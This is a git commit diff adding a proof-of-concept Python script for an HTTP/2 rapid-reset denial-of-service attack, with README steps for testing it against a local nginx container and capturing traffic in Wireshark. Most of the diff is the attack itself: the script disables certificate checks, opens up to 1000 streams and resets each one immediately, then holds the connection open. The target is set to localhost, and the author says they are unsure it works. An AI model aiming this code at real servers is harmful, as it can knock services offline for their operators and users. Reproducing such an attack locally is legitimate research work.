Add PoC

.gitignore

@@ -3,3 +3,6 @@ venv/
 
 __pycache__/
 *.py[cod]
+
+# ignore ssl keylogs
+*.log

README.md

@@ -1,12 +1,22 @@
 # rr-dev
 
-start http/2 enabled nginx server:
+1. start http/2 enabled nginx server:
 ```
 cd server
 docker compose up -d
 ```
 
-run poc:
+2. start capturing traffic in wireshark
+
+3. run poc script:
 ```
-# needs to be written first, lol
+python rr.py
 ```
+
+4. decode traffic in wireshark using `ssl-keylog.log` as the ssl keyfile
+
+## notes
+no clue if this actually works, but it seems to match the same behavior
+mentioned in the cloudflare blog.
+
+greets to psyk0, slerig, and all the other juggalols out there

src/rr.py

@@ -1 +1,54 @@
 """rrpoc"""
+import socket
+import ssl
+import certifi
+
+import h2.connection
+import h2.events
+
+from time import sleep
+
+ctx = ssl.create_default_context(cafile=certifi.where())
+ctx.set_alpn_protocols(['h2'])
+ctx.check_hostname = False
+ctx.verify_mode = ssl.CERT_NONE
+ctx.keylog_filename = 'ssl-keylog.log'
+
+
+def send_rr_packets(server='localhost', port=443, max_streams=1000):
+    s = socket.create_connection((server, port))
+    s = ctx.wrap_socket(s, server_hostname=server)
+    c = h2.connection.H2Connection()
+    c.initiate_connection()
+    s.sendall(c.data_to_send())
+
+    headers = [
+        (':method', 'GET'),
+        (':path', '/foo'),
+        (':authority', server),
+        (':scheme', 'https'),
+    ]
+
+    for _ in range(max_streams):
+        sid = c.get_next_available_stream_id()
+        c.send_headers(
+            stream_id=sid,
+            headers=headers,
+            end_stream=True
+        )
+        c.reset_stream(sid)
+    s.sendall(c.data_to_send())
+
+    # Add sleep or else the socket gets closed which causes server to
+    # stop trying to respond to our requests.
+    sleep(60)
+
+    s.close()
+
+
+def main():
+    send_rr_packets(server='localhost', port=443)
+
+
+if __name__ == '__main__':
+    main()